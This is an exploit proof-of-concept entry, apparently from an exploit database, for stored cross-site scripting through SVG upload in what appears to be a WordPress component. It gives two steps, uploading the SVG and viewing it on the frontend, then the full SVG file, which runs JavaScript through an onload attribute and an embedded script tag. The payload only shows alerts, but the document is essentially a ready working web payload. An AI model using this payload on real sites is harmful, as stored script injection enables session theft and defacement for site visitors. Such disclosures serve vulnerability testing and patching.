## https://sploitus.com/exploit?id=WPEX-ID:91898762-AA7D-4FBC-A016-3DE48901E5DE
1. Upload an SVG file with the following contents.
2. View the SVG file on the frontend and see the alerts.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
onload="javascript:alert(/XSS/)"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://creativecommons.org/ns#"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
id="svg3013"
sodipodi:docname="download_font_awesome.svg">
<script>alert(/XSS2/)</script>
</svg>